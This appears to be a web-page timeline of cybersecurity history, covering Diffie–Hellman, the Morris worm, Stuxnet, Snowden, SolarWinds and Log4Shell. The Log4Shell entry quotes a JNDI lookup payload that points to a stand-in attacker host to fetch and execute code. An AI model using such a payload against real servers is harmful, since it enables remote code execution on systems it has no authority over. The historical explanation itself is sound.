Detailed · 12 events
A History of Cybersecurity
1970s

Dan Spisak (Wikimedia Commons) · CC BY-SA 2.0 · Commons ↗ The paper by Whitfield Diffie and Martin Hellman in IEEE Transactions on Information Theory, volume IT-22, number 6. It set out the concept of public-key cryptography — that the enciphering and deciphering keys can be separated — the concept of a digital signature standing in for a handwritten one, and a key-exchange method that actually worked, resting on the difficulty of computing discrete logarithms in a finite field. What it did not contain was a working public-key cryptosystem; that is RSA, of 1977–78. Ralph Merkle, who had a different solution to key distribution first, is cited explicitly in the paper, and Britain's GCHQ disclosed in December 1997 that it had reached equivalent results between 1969 and 1974 in secret.
1980s

Trevor Blackwell (Wikimedia Commons) · CC BY-SA 3.0 / GFDL · Commons ↗ On the night of 2 November 1988 a worm released by Cornell graduate student Robert Tappan Morris chained four routes — sendmail's DEBUG feature, a fingerd buffer overflow, trusted-host relationships, and password guessing — to self-replicate across the early Internet and paralyse large numbers of UNIX hosts. No official count of infected machines exists: the widely cited figure of about 6,000 came from contemporaneous press accounts, and the GAO's 1989 report describes it as an extrapolation from MIT's estimate that 10% of its own machines were hit, while recording a Harvard researcher's counter-estimate of 1,000–3,000. A design choice to re-infect a host anyway one time in seven left single machines running many copies at once. Indicted in July 1989, Morris became the first person convicted under the 1986 Computer Fraud and Abuse Act (CFAA); in May 1990 he received three years' probation, 400 hours of community service and a US$10,050 fine — no prison. The incident drove DARPA to create the CERT Coordination Center, founding the discipline of computer-security incident response.
2010s

Hamed Saber (Wikimedia Commons) · CC BY 2.0 · Commons ↗ In June 2010 analysts at VirusBlokAda, a Belarusian anti-virus vendor, found unusual malware on an Iranian customer's systems. Joint analysis by Symantec, Kaspersky, and Ralph Langner's team then exposed the full picture. Stuxnet combined four zero-days (LNK, print spooler, Win32k, Task Scheduler), compromised legitimate code-signing certificates (Realtek, JMicron), and deep knowledge of the Siemens Step7/WinCC toolchain and S7-315 PLCs to rewrite centrifuge drive frequencies at Iran's Natanz enrichment plant and break the machines physically. The New York Times reported in 2012 that it was part of a joint US NSA / Israeli Unit 8200 operation codenamed Olympic Games; neither government has ever formally acknowledged it. About 1,000 IR-1 centrifuges were replaced at Natanz between late 2009 and early 2010, and reading that as Stuxnet's effect is the preliminary assessment of the Institute for Science and International Security. On the public record it is the first instance of a state using malware to cause physical destruction, and it redefined what cyber warfare means.

Gage Skidmore (Wikimedia Commons) · CC BY-SA 2.0 · Commons ↗ On 5 June 2013 *The Guardian* published Glenn Greenwald's story revealing NSA bulk collection of Verizon call metadata. On 6 June *The Guardian* and *The Washington Post* simultaneously broke PRISM — collection from nine US providers, among them Microsoft, Google, Yahoo, Facebook and Apple, compelled under Section 702 of FISA. The source, soon visible on video from a Hong Kong hotel, was Edward Snowden, a 29-year-old NSA contractor at Booz Allen Hamilton. Over the following months the leaked archive — put at 50,000 to 200,000 documents, with US officials claiming far more, and only a fraction ever published — exposed XKeyscore, Bullrun (the campaign against encryption), MUSCULAR (taps on Google–Yahoo data-centre fibre), GCHQ's Tempora, and the interception of allied heads of state. Snowden fled via Hong Kong to Moscow, where as of 2026 he still lives. The disclosures set off the global privacy debate, drove mainstream end-to-end encryption (Signal, WhatsApp), the HTTPS Everywhere push, and the broader critique of surveillance capitalism.
2020s
Orthopedicshoes / SolarWinds (Wikimedia Commons) · CC BY 4.0 · Commons ↗ On 13 December 2020 the security firm FireEye (later Mandiant) and Microsoft disclosed that Russia's SVR foreign-intelligence service — known to Western agencies as APT29 / Cozy Bear, later "Midnight Blizzard" — had implanted the SUNBURST backdoor into the legitimate build pipeline of SolarWinds Orion, a widely deployed network-management product. Trojaned Orion updates (versions 2019.4 HF5 through 2020.2.1) were distributed between March and June 2020 and downloaded by about 18,000 organisations. A smaller cluster of several hundred organisations was then targeted for deeper intrusion, including nine US federal agencies (Treasury, DHS, State, Justice, Commerce, Energy, NIH, NTIA, and others) and major vendors such as Microsoft, Cisco, FireEye, and Mimecast. The case is also notable because FireEye discovered the campaign on itself — a top-tier security company that the attackers had tried, and failed, to use as a stepping stone. It remains the canonical large-scale software supply-chain attack.
Apache Software Foundation / Jim McKeeth (Wikimedia Commons) · Apache License 2.0 / CC0 1.0 · Commons ↗ On 24 November 2021 Chen Zhaojun of Alibaba Cloud's security team reported a remote-code-execution vulnerability in Apache Log4j 2.x's JNDI lookup feature — later CVE-2021-44228, CVSS 10.0 — to the Apache Software Foundation. On 9 December a proof-of-concept leaked on Twitter and the ASF released the emergency patch (Log4j 2.15.0). The exploit was trivially simple: any attacker-controlled string of the form `${jndi:ldap://attacker.com/x}` that ended up in a log statement would cause the server to fetch and execute Java bytecode from the attacker. The first widely shared demonstration used the chat box of Minecraft (Java Edition) to hijack other players' servers. The blast radius ran to hundreds of millions of devices: Log4j is the de-facto standard logger of the Java ecosystem, embedded inside Apache, Twitter, Apple iCloud, Steam, Tencent QQ, Amazon, IBM, Oracle, and virtually every other major Java stack. The White House convened an emergency open-source security summit and accelerated SBOM mandates; CISA ordered US federal agencies into unprecedented end-of-year remediation.
- EVT.009T1The CrowdStrike Falcon Outage — The Largest IT Outage in HistoryA History of Cloud ComputingA General History of Information TechnologyRead more →
- EVT.011T1Executive Order 14409 — 'Covered Frontier Models' and a Voluntary Pre-Release FrameworkA History of Artificial IntelligenceA General History of Information TechnologyRead more →
- EVT.012T1Commerce Puts Two Anthropic Models Under Export Control — Nineteen Days DarkA History of Artificial IntelligenceA General History of Information TechnologyRead more →
